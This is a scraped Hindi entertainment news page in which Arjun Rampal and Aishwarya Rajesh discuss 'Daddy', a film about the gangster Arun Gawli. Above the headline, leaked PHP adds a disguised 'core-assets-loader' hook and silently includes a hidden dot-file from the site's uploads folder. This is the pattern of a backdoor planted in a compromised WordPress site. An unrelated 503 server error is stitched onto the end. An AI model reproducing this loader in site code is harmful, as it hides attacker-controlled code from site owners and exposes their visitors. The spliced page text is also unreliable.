add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अर्जुन रामपाल ने कहा, हमनें अरुण गवली पर अच्छी फिल्म बनाई है – SOCH INDIA
Menu

मनोरंजन
अर्जुन रामपाल ने कहा, हमनें अरुण गवली पर अच्छी फिल्म बनाई है

nobanner

बॉलीवुड अभिनेता अर्जुन रामपाल ने कहा कि दर्शक ‘डैडी’ के साथ एक अच्छी फिल्म होने की उम्मीद कर सकते हैं. यह फिल्म मुंबई के ‘बिग डैडी’ कहे जाने वाले माफिया अरुण गवली के जीवन के इर्द-गिर्द घूमती है. अशीम अहलुवालिया के निर्देशन में बनी इस फिल्म में अर्जुन ने गैंगस्टर गवली का किरदार निभाया है.

फिल्म में अरुण गवली की पत्नी का किरदार निभा रहीं अभिनेत्री ऐश्वर्या राजेश के साथ अर्जुन ने शुक्रवार को दग्ड़ी चॉल में गवली की बेटी योगिता के काड़ा फाउंडेशन के सामाजिक कार्यक्रम में हिस्सा लिया. दाग्दी चॉल का क्षेत्र गैंगस्टर अरुण गवली के प्रभाव वाला इलाका माना जाता है.

अर्जुन ने एक बयान में कहा, “मैं काड़ा फाउंडेशन को उनकी पहल के लिए धन्यवाद देना चाहता हूं. मैं यहां आकर खुश हूं. मेरा दग्ड़ी चॉल के साथ एक खास जुड़ाव है. मुझे दग्ड़ी चॉल से बहुत सारा प्यार प्यार मिला है. मैं मानता हूं, हमने ‘डैडी’ (अरुण गवली) पर एक अच्छी फिल्म बनाई है.”

उन्होंने कहा, “मैं गवली परिवार का शुक्रगुजार हूं, कि उन्होंने हम पर भरोसा जताया और डैडी पर फिल्म बनाने की इजाज़त दी. फिल्म में ऐश्वर्या ने आशा गवली (अरुण गवली की पत्नी) का किरदार निभाया है और उन्होंने इस किरदार को अच्छे से निभाया है.”

तमिल और मलयालम फिल्मों में अपने अभिनय के लिए पहचानी जाने वाली ऐश्वर्या राजेश फिल्म ‘डैडी’ के साथ बॉलीवुड में अपने करियर की शुरुआत कर रही हैं.

ऐश्वर्या ने कहा, “मैंने फिल्म में आशा ताई (आशा गवली) का किरदार निभाया है. मुझे उम्मीद है कि मैंने इस किरदार के साथ न्याय किया होगा और आशा ताई और अरुण गवली इसे पसंद करेंगे.”

अभिनेत्री ने कहा, “हिंदी फिल्म जगत में मुझे मौका देने के लिए मैं अर्जुन की शुक्रगुजार हूं. मैंने तमिल और मलयालम सिनेमा में कुछ अच्छी फिल्में की हैं. मैं वादा करती हूं कि हिंदी फिल्मों में काम करने के लिए अगले दो, तीन महीनों में अच्छी हिंदी बोलना सीखूंगी.”

आपको बता दें कि ‘डैडी’ 8 सितंबर को सिनेमाघरों में रिलीज होने जा रही है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.